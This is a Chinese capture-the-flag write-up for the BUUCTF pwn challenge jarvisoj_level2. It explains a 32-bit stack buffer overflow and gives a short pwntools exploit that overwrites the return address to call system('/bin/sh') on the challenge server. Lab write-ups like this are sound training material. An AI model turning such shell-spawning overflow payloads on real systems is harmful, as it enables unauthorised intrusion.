[BUUCTF]PWN16——jarvisoj_level2

[BUUCTF]PWN16——jarvisoj_level2

附件

步骤
例行检查,32位,开启了nx保护
在这里插入图片描述
试运行一下程序
在这里插入图片描述
32位ida载入,shift+f12查看一下程序里的字符串,发现了system函数和 /bin/sh 字符串
在这里插入图片描述
双击跟进,ctrl+x本想查看调用该字符串的函数的,没有找到,但是程序里有这些字符串的位置,
shell_addr=0x804a024
在这里插入图片描述
system_addr=0x8048320
在这里插入图片描述
我们可以直接利用这些构造 system(/bin/sh)去执行
跟进试运行时候看到的字符串,找到输入点
在这里插入图片描述
buf的大小是0x88,读入的数据大小是0x100,可以溢出0x78个字节,用来构造rop足够

EXP:

from pwn import*

r=remote('node3.buuoj.cn',26675)
shell_addr=0x804a024
system=0x8048320

payload='a'*(0x88+4)+p32(system)+p32(8)+p32(shell_addr)

r.sendline(payload)
r.interactive()

在这里插入图片描述

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/xlrp/p/14273718.html